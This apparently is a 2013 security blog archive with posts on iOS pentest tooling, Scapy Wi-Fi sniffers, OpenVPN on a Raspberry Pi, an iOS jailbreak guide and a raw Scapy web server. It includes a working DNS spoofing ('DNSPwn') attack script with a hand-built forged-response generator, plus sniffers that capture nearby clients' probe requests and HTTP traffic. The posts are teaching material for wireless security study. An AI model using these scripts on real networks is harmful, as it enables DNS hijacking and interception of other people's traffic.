Dec 28, 2013

Creating an iOS 7 Application Pentesting Environment

Packages to install after jailbreaking. SSH to the iPhone and apt-get install them. The list reads like a dpkg inventory of a working setup, so skip the entries a freshly jailbroken device already has (cydia, firmware, com.evad3rs.evasi0n7 and the cy+ capability packages) and keep the BigBoss repository enabled, which Cydia does by default, for packages such as bigbosshackertools and class-dump.


adv-cmds
apr
apr-lib
apr-util
apt
apt7
apt7-key
apt7-lib
apt7-ssl
base
bash
basic-cmds
berkeleydb
bigbosshackertools
bootstrap-cmds
bzip2
class-dump
com.ericasadun.utilities
com.evad3rs.evasi0n7
com.innoying.sbutils
coreutils
coreutils-bin
curl
cy+cpu.arm
cy+kernel.darwin
cy+lib.corefoundation
cy+model.ipad
cy+os.ios
cydia
cydia-lproj
darwintools
debianutils
developer-cmds
diffutils
diskdev-cmds
dpkg
expat
file
file-cmds
findutils
firmware
firmware-sbin
gawk
gdb
gettext
git
gnupg
grep
gzip
inetutils
iokittools
ldid
less
libffi
libxml2
libxml2-lib
lsof
lzma
make
nano
ncurses
neon
network-cmds
odcctools
openssh
openssl
org.thebigboss.repo.icons
p7zip
pam
pam-modules
patch
pcre
profile.d
python
readline
rsync
sed
shell-cmds
sqlite3
sqlite3-lib
subversion
system-cmds
tar
tcpdump
top
uikittools
unrar
unzip
uuid
vim
wget
whois
xar
xml2
zip



Source:  http://carnal0wnage.attackresearch.com/2013/12/creating-ios7-application-pentesting.html



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 27, 2013

Howto: Finding Hidden AP With Scapy

#!/usr/bin/env python

from scapy.all import *

# 802.11 frame control values (Wireshark display-filter names, for reference):
#wlan.fc.type == 0           Management frames
#wlan.fc.type == 1           Control frames
#wlan.fc.type == 2           Data frames
#wlan.fc.type_subtype == 0   Association request
#wlan.fc.type_subtype == 1   Association response
#wlan.fc.type_subtype == 2   Reassociation request
#wlan.fc.type_subtype == 3   Reassociation response
#wlan.fc.type_subtype == 4   Probe request
#wlan.fc.type_subtype == 5   Probe response
#wlan.fc.type_subtype == 8   Beacon

m_face = 'mon0'   # interface in monitor mode

aps = {}          # BSSID -> SSID seen so far (b'' while the network is still hidden)

def get_ssid(frame):
    """Return the SSID element (tag ID 0) from the tagged parameters, or None."""
    elt = frame.getlayer(Dot11Elt)
    while elt is not None:
        if elt.ID == 0:
            return elt.info
        elt = elt.payload.getlayer(Dot11Elt)
    return None

def find_ssid(probe):
    if not probe.haslayer(Dot11):
        return
    # Beacons are type 0 / subtype 8, probe responses type 0 / subtype 5. A hidden AP
    # beacons with an empty (or all-NUL) SSID but answers a directed probe request
    # with the real name, so the probe response is what reveals it.
    if probe.type == 0 and probe.subtype in (5, 8):
        ssid = get_ssid(probe)
        if ssid is None:
            return
        hidden = ssid.strip(b'\x00') == b''
        bssid = probe.addr2
        name = '<hidden>' if hidden else ssid.decode('utf-8', 'replace')
        if bssid not in aps:
            aps[bssid] = b'' if hidden else ssid
            print("BSSID: %s, SSID: %s" % (bssid, name))
        elif aps[bssid] == b'' and not hidden:
            aps[bssid] = ssid
            print("BSSID: %s, hidden SSID revealed: %s" % (bssid, name))

sniff(iface=m_face, prn=find_ssid)





Howto: Wireless Client List With Scapy

#!/usr/bin/env python
import sys

from scapy.all import *

PROBE_REQ_TYPE = 0      # management frame
PROBE_REQ_SUBTYPE = 4   # probe request

unique_ssids = []
clients = {}            # client MAC -> set of SSIDs it has probed for

def PacketHandler(pkt):
    if not pkt.haslayer(Dot11):
        return
    # check for a probe request (type 0, subtype 4)
    if pkt.type == PROBE_REQ_TYPE and pkt.subtype == PROBE_REQ_SUBTYPE:
        elt = pkt.getlayer(Dot11Elt)
        ssid = elt.info if elt is not None and elt.ID == 0 else None
        # null probe removal: a broadcast probe carries an empty SSID and tells us nothing
        if not ssid:
            return
        client = pkt.addr2
        clients.setdefault(client, set()).add(ssid)
        if ssid not in unique_ssids:
            unique_ssids.append(ssid)
            print("New probed SSID: %s (from client %s)" % (ssid, client))

# usage: script.py <monitor-mode interface> <number of frames to capture>
sniff(iface=sys.argv[1], count=int(sys.argv[2]), prn=PacketHandler)
 
Source: http://forums.securitytube.net/t/wi-fi-client-probe-sniffer-with-scapy/63 
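Both sniffers above rely on Scapy's Dot11 dissector for the same three management frames (beacon, probe response, probe request). The following is an added example, not code from either post or from the linked sources: a dependency-free Python 3 parser for those frames that pulls the SSID element out of the tagged parameters, plus a tracker that behaves like the two scripts combined. It notes a hidden AP (beacon with an empty or all-NUL SSID), reports the real name once a probe response carries it, and records which SSIDs each client probes for while ignoring broadcast probes. The MAC addresses and frames built in demo() are constructed for the example.

```python
import struct
from collections import namedtuple

# 802.11 frame-control values used below (type 0 = management frame).
MGMT = 0
PROBE_REQ, PROBE_RESP, BEACON = 4, 5, 8

Frame = namedtuple("Frame", "ftype subtype addr1 addr2 addr3 ssid")

def mac_str(raw):
    return ":".join("%02x" % b for b in raw)

def find_ssid(tags):
    """Walk the tagged parameters (ID, length, value) and return the SSID element (ID 0)."""
    off = 0
    while off + 2 <= len(tags):
        tag_id, tag_len = tags[off], tags[off + 1]
        value = tags[off + 2:off + 2 + tag_len]
        if len(value) < tag_len:          # truncated element: stop rather than mis-parse
            return None
        if tag_id == 0:
            return value
        off += 2 + tag_len
    return None

def parse_mgmt(raw):
    """Parse the 24-byte MAC header and, for beacons / probe requests / probe
    responses, the SSID from the frame body. Other frames get ssid=None."""
    if len(raw) < 24:
        raise ValueError("truncated 802.11 header")
    fc = raw[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    addrs = [mac_str(raw[i:i + 6]) for i in (4, 10, 16)]
    ssid = None
    if ftype == MGMT and subtype in (BEACON, PROBE_RESP):
        # fixed fields first: timestamp(8) + beacon interval(2) + capabilities(2)
        ssid = find_ssid(raw[36:])
    elif ftype == MGMT and subtype == PROBE_REQ:
        ssid = find_ssid(raw[24:])
    return Frame(ftype, subtype, addrs[0], addrs[1], addrs[2], ssid)

def is_hidden(ssid):
    """Hidden networks beacon with a zero-length SSID or one made only of NUL bytes."""
    return len(ssid) == 0 or ssid.strip(b"\x00") == b""

class Tracker:
    """Learn BSSIDs from beacons/probe responses, clients from probe requests,
    and notice when a hidden SSID is revealed by a probe response."""
    def __init__(self):
        self.aps = {}       # bssid -> ssid bytes, or None while still hidden
        self.clients = {}   # client mac -> set of SSIDs it probed for

    def feed(self, raw):
        f = parse_mgmt(raw)
        if f.ssid is None:
            return None
        if f.subtype in (BEACON, PROBE_RESP):
            if is_hidden(f.ssid):
                if f.addr2 in self.aps:
                    return None
                self.aps[f.addr2] = None
                return ("hidden", f.addr2)
            if self.aps.get(f.addr2) is not None:
                return None
            event = "revealed" if f.addr2 in self.aps else "ap"
            self.aps[f.addr2] = f.ssid
            return (event, f.addr2, f.ssid)
        if f.subtype == PROBE_REQ:
            if is_hidden(f.ssid):         # broadcast probe: nothing to learn about the client
                return None
            probed = self.clients.setdefault(f.addr2, set())
            if f.ssid in probed:
                return None
            probed.add(f.ssid)
            return ("client", f.addr2, f.ssid)
        return None

def build_mgmt(subtype, addr1, addr2, addr3, ssid):
    """Constructed test frame: FC(2) dur(2) addr1-3 seq(2) [fixed fields] SSID element."""
    fc = struct.pack("<H", (subtype << 4) | (MGMT << 2))
    hdr = fc + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00"
    fixed = b"\x00" * 12 if subtype in (BEACON, PROBE_RESP) else b""
    return hdr + fixed + bytes([0, len(ssid)]) + ssid

def demo():
    """Constructed scenario: one hidden AP, one client, one ordinary AP."""
    ap, client, bcast = b"\x00\x11\x22\x33\x44\x55", b"\xaa\xbb\xcc\xdd\xee\x01", b"\xff" * 6
    other = b"\x66\x77\x88\x99\xaa\xbb"
    frames = [
        build_mgmt(BEACON, bcast, ap, ap, b""),                 # hidden AP beacon
        build_mgmt(PROBE_REQ, bcast, client, bcast, b""),       # broadcast probe, ignored
        build_mgmt(PROBE_REQ, bcast, client, bcast, b"CorpWiFi"),
        build_mgmt(PROBE_RESP, client, ap, ap, b"CorpWiFi"),    # reveals the hidden name
        build_mgmt(BEACON, bcast, ap, ap, b"\x00" * 8),         # still hidden in beacons
        build_mgmt(BEACON, bcast, other, other, b"Guest"),
    ]
    t = Tracker()
    return [e for e in (t.feed(f) for f in frames) if e is not None]

if __name__ == "__main__":
    for event in demo():
        print(event)
```

To use it on live traffic, feed Tracker.feed() the bytes of each captured frame after its radiotap header (for Scapy, bytes(pkt[Dot11])); the parser deliberately stops at a truncated tag instead of guessing, since malformed beacons are common in the wild.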





Dec 25, 2013

Videos: DefCon 21(2013)

Video List Of DefCon 21 Conference 2013

https://www.youtube.com/playlist?list=PL9fPq3eQfaaBD_8E9PJ8yyiTL0JhynlGK



Howto: Install Openvpn On Raspberry-Pi(Raspbian)

Requirements

Raspbian or a similar Debian-based distribution.

Step 1

To install current package versions, first update the package sources.

Step 2

Install OpenVPN and OpenSSL.

Step 3

Change into the OpenVPN directory (/etc/openvpn) and copy the easy-rsa directory into it; it is needed for the certificate steps below.

Step 4

Open easy-rsa/vars with nano and adjust the certificate settings.

Step 5

Change into that directory, become root and run the easy-rsa setup commands.

Step 6

Now generate the certificates and keys OpenVPN uses for its encryption. After the first command you will be asked for your country code (US = USA, DE = Germany, AT = Austria, CH = Switzerland); all other prompts can simply be confirmed.

Step 7

Generating the last components can take several minutes on a Pi.

Step 8

Switch back to /etc/openvpn and create the file openvpn.conf with the server configuration.
You can change the DNS servers it pushes to any DNS you like.

Step 9

Now set up internet forwarding for the VPN clients. If the Pi is not connected by Ethernet cable (e.g. it uses Wi-Fi), replace "eth0" with the name of your network interface.

Step 10

One of the final steps is to remove the "#" in front of net.ipv4.ip_forward=1 in /etc/sysctl.conf, so that forwarding survives a reboot.

Step 11

The forwarding rule from Step 9 has to be re-applied at boot to work permanently. Insert the following line at the end of the crontab file (again replacing "eth0" if you did so above).

Step 12

Become root again, change to /etc/openvpn/easy-rsa/keys and create the file raspberrypi.ovpn there with the client configuration. RASPBERRY-PI-IP must be replaced by the public IP address of your Pi or, if you use a DynDNS service, by that domain name.

Step 13

Now pack all the files the client needs into an archive, place it in /home/pi and give the user pi the rights to read it.

Step 14

Start (or restart) the OpenVPN server:

sudo /etc/init.d/openvpn start



Source:  http://www.n0where.net/openvpn-raspberry-pi/




Dec 24, 2013

DNSPwn Attack

from scapy.all import *

spoofed_ip = '192.168.2.1'   # address every A query is answered with
m_iface = 'mon0'             # monitor-mode interface; the attack targets an open (unencrypted) Wi-Fi network

def send_response(x):
  # Get the requested domain
  req_domain = x[DNS].qd.qname
  # Let's build our response from a copy of the original packet
  response = x.copy()
  # We need to start by changing our response to be "from-DS", or from the access point.
  response.FCfield = 2
  # Switch the MAC addresses
  response.addr1, response.addr2 = x.addr2, x.addr1
  # Switch the IP addresses
  response.src, response.dst = x.dst, x.src
  # Switch the ports
  response.sport, response.dport = x.dport, x.sport
  # Set the DNS flags
  response[DNS].qr = 1
  response[DNS].ra = 1
  response[DNS].ancount = 1
  response[DNS].an = DNSRR(
    rrname = req_domain,
    type = 'A',
    rclass = 'IN',
    ttl = 900,
    rdata = spoofed_ip
    )
  # Drop the lengths and checksums copied from the query so Scapy recomputes them;
  # a reply carrying the query's stale UDP checksum is silently discarded by the client.
  del response[IP].len, response[IP].chksum, response[UDP].len, response[UDP].chksum
  # The forged answer has to beat the real resolver's reply, so send immediately.
  sendp(response, iface=m_iface, verbose=False)

# sniff() blocks, so the handler must be defined before it is called.
# Only answer queries (qr == 0): answering responses would loop on our own packets.
sniff(iface=m_iface, prn=send_response,
  lfilter=lambda x: x.haslayer(Dot11) and x.haslayer(UDP) and x.haslayer(DNS)
                    and x[UDP].dport == 53 and x[DNS].qr == 0)
 
 
Source: http://jordan-wright.github.io/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/    
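The Scapy script edits a captured query in place, so the DNS details stay implicit. The following added example (not from the page or the linked post) builds the same forged answer at the wire-format level in plain Python 3: parse the question, keep the transaction ID, set QR and RA, and append one A record whose name is a compression pointer to the original question. It also declines to answer anything that is not an A/IN query, since a forged A record for an AAAA question is simply ignored by the resolver. The transaction ID, domain name and spoofed address below are constructed values.

```python
import socket
import struct

QTYPE_A, QTYPE_AAAA, QCLASS_IN = 1, 28, 1

def encode_name(name):
    """'www.example.com' -> b'\\x03www\\x07example\\x03com\\x00'"""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(msg, off):
    """Decode a possibly compressed name at msg[off]; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                    # compression pointer (RFC 1035 4.1.4)
            hops += 1
            if hops > 16:
                raise ValueError("pointer loop")
            if end is None:
                end = off + 2                        # the name ends after the first pointer
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)

def build_query(txid, name, qtype=QTYPE_A):
    """Constructed client query: RD set, one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)

def parse_question(msg):
    """Header plus the first question; 'end' is the offset where the answer section starts."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"id": txid, "flags": flags, "qname": qname, "qtype": qtype,
            "qclass": qclass, "ancount": an, "end": off + 4}

def build_spoofed_response(query, spoofed_ip, ttl=900):
    """Same logic as the Scapy script: keep ID and question, set QR/RA, add one A record."""
    q = parse_question(query)
    if q["flags"] & 0x8000 or q["qtype"] != QTYPE_A or q["qclass"] != QCLASS_IN:
        return None            # not a query, or not an A/IN question: a forged A record would be ignored
    flags = 0x8000 | (q["flags"] & 0x7900) | 0x0080   # QR=1, keep opcode and RD, RA=1, RCODE=0
    header = struct.pack("!HHHHHH", q["id"], flags, 1, 1, 0, 0)
    question = encode_name(q["qname"]) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    # 0xC00C: pointer to offset 12, i.e. the question name; rdlength 4 for an IPv4 address
    answer = (b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(spoofed_ip))
    return header + question + answer

def parse_response(msg):
    """Parse a response back out, as the victim's resolver would."""
    r = parse_question(msg)
    off, answers = r["end"], []
    for _ in range(r["ancount"]):
        name, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            rdata = socket.inet_ntoa(rdata)
        answers.append((name, ttl, rdata))
    return {"id": r["id"], "qr": bool(r["flags"] & 0x8000),
            "ra": bool(r["flags"] & 0x0080), "answers": answers}

if __name__ == "__main__":
    forged = build_spoofed_response(build_query(0x1234, "example.com"), "192.168.2.1")
    print(parse_response(forged))
```

The resolver matches a reply on transaction ID, source port and question, so everything except the flags and the answer section is copied verbatim; that is also why the Scapy version copies the whole packet instead of building a fresh one.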



Build Web Server With Scapy

#!/usr/bin/python
from scapy.all import *
import random

# The script waits for an incoming connection to our IP address, i.e. 192.168.1.1.
# Linux can carry several IP addresses on one interface, so the filter checks the
# address explicitly; it is also limited to TCP port 80, nothing else matters here.
#
# Caveat: the kernel has no socket listening on 192.168.1.1:80, so it answers the
# client's SYN with its own RST before this script gets a chance. Suppress that first:
#   iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 192.168.1.1 -j DROP

# Wait for the SYN of the client
a = sniff(count=1, filter="tcp and host 192.168.1.1 and port 80")

# Initializing some variables for later use.
ValueOfPort = a[0].sport
SeqNr = random.randrange(0, 2 ** 32)  # our own initial sequence number
AckNr = a[0].seq + 1                   # We are Syn-Acking, so this must be the client's ISN + 1

# Note that Wireshark and tcpdump display sequence numbers relative to the ISN;
# Scapy works with the absolute values seen on the wire.
# As we received the connecting SYN of the client, we answer with a correct
# SYN-ACK to finish our part of the TCP handshake:

# Generating the IP layer:
ip = IP(src="192.168.1.1", dst="192.168.1.2")

# Generating TCP layer: src port 80, dest port of client,
# flags SA means "Syn-Ack", the AckNr is +1, and the MSS shall be a default 1460.
TCP_SYNACK = TCP(sport=80, dport=ValueOfPort, flags="SA", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])

# send SYNACK to remote host AND receive ACK
ANSWER = sr1(ip/TCP_SYNACK)

# Capture the next TCP segment for port 80 that carries data (the HTTP GET request);
# the lfilter skips bare ACKs, which have no Raw layer.
GEThttp = sniff(filter="tcp and port 80", count=1, lfilter=lambda x: x.haslayer(Raw),
                prn=lambda x: x.sprintf("{IP:%IP.src%: %TCP.dport%}"))

# Updating the sequence number as well as the Ack number
AckNr = AckNr + len(GEThttp[0].load)
SeqNr = SeqNr + 1                      # our SYN consumed one sequence number

# Print the GET request of the client (contains browser data and similar data).
# (Sanity check: size of data should be greater than 1.)
if len(GEThttp[0].load) > 1:
    print(GEThttp[0].load)

# Generate custom http file content. Content-Length is computed from the body
# rather than hard-coded, so the browser never waits for bytes that do not come.
body = ("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\"><html><head><title>Testserver</title></head>"
        "<body bgcolor=\"black\" text=\"white\" link=\"blue\" vlink=\"purple\" alink=\"red\">"
        "<p><font face=\"Courier\" color=\"blue\">-Welcome to test server-------------------------------</font></p></body></html>")
html1 = ("HTTP/1.1 200 OK\r\nDate: Wed, 29 Sep 2010 20:19:05 GMT\r\nServer: Testserver\r\n"
         "Connection: Keep-Alive\r\nContent-Type: text/html; charset=UTF-8\r\n"
         "Content-Length: %d\r\n\r\n" % len(body)) + body

# Generate TCP layer
data1 = TCP(sport=80, dport=ValueOfPort, flags="PA", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])

# Construct whole network packet, send it and fetch the returning ack.
ackdata1 = sr1(ip/data1/html1)
# Store new sequence number.
SeqNr = ackdata1.ack

# Generate RST-ACK packet
Bye = TCP(sport=80, dport=ValueOfPort, flags="RA", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])

send(ip/Bye)

# the end.

# Other than the sr functions above, 'send' just sends the data and doesn't capture
# the answer. It is the right choice when the answer is irrelevant (which is the case here).
 

Source: http://akaljed.wordpress.com/2010/12/12/scapy-as-webserver/







Dec 22, 2013

Howto: Jailbreak iPhone 5S, 5, 5C, iPad, iPod Touch (By Evasi0n7)

Jailbreak iOS 7, 7.0.3 and 7.0.4 untethered for iPhone 5s, 5c, 5, iPad and iPod touch (Guide)

Jailbreak iOS 7 with the evasi0n7 untethered guide! So we're really surprised by the news this morning about the iOS 7.x jailbreak released by the evad3rs team. Evasi0n7 gives you the ability to jailbreak your iOS 7.x device in a few minutes. Below is a full step-by-step guide to the whole jailbreak process!

STEP 1: Download Evasi0n7 for Mac OS X or Windows.

STEP 2: Download your iOS 7.x.x firmware from our download page.

STEP 3: Make sure to back up all the data on your iPhone using iTunes or iCloud before running the Evasi0n7 untethered jailbreak.

STEP 4: Launch Evasi0n7, plug your device into the computer and click the "Jailbreak" button.

STEP 5: Evasi0n7 now starts the jailbreak process, so sit back and wait.

STEP 6: Evasi0n7 will reboot your device.

STEP 7: When it is done, an Evasi0n7 app appears on your iPhone's home screen. Tap it.

STEP 8: Your device will reboot again.

STEP 9: Evasi0n7 continues processing the jailbreak and will reboot your iPhone several times until it is finished.

STEP 10: Cydia is there and you are ready to go.




Source: http://www.redsn0w.us/2013/12/jailbreak-7-703-704-untethered-for.html




Simple Sniffer HTTP Request and HTTP Response with Python Scapy

You must install Scapy-HTTP (the HTTP module imported below) before running this code; Scapy 2.4.3 and later ship an equivalent built-in scapy.layers.http module with the same HTTPRequest and HTTPResponse layer names.

#!/usr/bin/env python

from scapy.all import *
from scapy.error import Scapy_Exception
import HTTP   # Scapy-HTTP: provides the HTTP, HTTPRequest and HTTPResponse layers

m_iface = "wlan0"
count = 0

def pktTCP(pkt):
    global count
    count = count + 1
    # Check the layers explicitly: `HTTP.HTTPRequest or HTTP.HTTPResponse in pkt`
    # is always true, because a class object is truthy.
    if pkt.haslayer(HTTP.HTTPRequest) or pkt.haslayer(HTTP.HTTPResponse):
        src = pkt[IP].src
        srcport = pkt[TCP].sport
        dst = pkt[IP].dst
        dstport = pkt[TCP].dport
        test = pkt[TCP].payload
        if pkt.haslayer(HTTP.HTTPRequest):
            print("HTTP Request: %s:%d -> %s:%d" % (src, srcport, dst, dstport))
            print(test)
            print("======================================================================")

        if pkt.haslayer(HTTP.HTTPResponse):
            print("HTTP Response: %s:%d -> %s:%d" % (src, srcport, dst, dstport))
            print(test)
            print("======================================================================")

sniff(filter='tcp and port 80', iface=m_iface, prn=pktTCP)
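The Scapy web server above hard-codes a Content-Length and this sniffer relies on the Scapy-HTTP dissector to tell requests from responses. As an added example (not code from either post), here is a small Python 3 HTTP/1.x message parser that classifies a raw TCP payload as request or response, splits headers from body and checks the body against Content-Length, plus a builder that produces the server's reply with the length computed from the body. The sample request and page body are constructed.

```python
def parse_http(payload):
    """Split a raw TCP payload into start line, headers and body; classify it.
    Returns None when the payload is not the start of an HTTP message."""
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        return None                                   # head not complete (or not HTTP at all)
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if parts[0].startswith("HTTP/") and len(parts) >= 2 and parts[1].isdigit():
        msg = {"kind": "response", "version": parts[0], "status": int(parts[1]),
               "reason": parts[2] if len(parts) == 3 else ""}
    elif len(parts) == 3 and parts[2].startswith("HTTP/"):
        msg = {"kind": "request", "method": parts[0], "target": parts[1], "version": parts[2]}
    else:
        return None                                   # some other protocol on port 80
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon:
            return None                               # malformed header line
        headers[name.strip().lower()] = value.strip()
    msg["headers"] = headers
    declared = headers.get("content-length")
    if declared is not None and declared.isdigit():
        msg["body"] = body[:int(declared)]
        msg["complete"] = len(body) >= int(declared)  # more segments still to come otherwise
    else:
        msg["body"] = body
        msg["complete"] = declared is None
    return msg

def build_response(body, status="200 OK", content_type="text/html; charset=UTF-8"):
    """Build the reply the Scapy web server sends, with Content-Length taken from the body."""
    if isinstance(body, str):
        body = body.encode("utf-8")
    head = ("HTTP/1.1 %s\r\nServer: Testserver\r\nConnection: close\r\n"
            "Content-Type: %s\r\nContent-Length: %d\r\n\r\n" % (status, content_type, len(body)))
    return head.encode("latin-1") + body

# Constructed sample request, as a browser or curl would send it to the Scapy server.
GET_SAMPLE = (b"GET /index.html HTTP/1.1\r\nHost: 192.168.1.1\r\n"
              b"User-Agent: curl/7.0\r\nAccept: */*\r\n\r\n")

if __name__ == "__main__":
    print(parse_http(GET_SAMPLE))
    print(parse_http(build_response("<html><body>-Welcome to test server-</body></html>")))
```

Fed with the payload of each captured segment, the parser gives the same request/response split as the dissector without a third-party layer; the "complete" flag is what tells you whether a response body spans further segments, which a per-packet sniffer otherwise misses.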

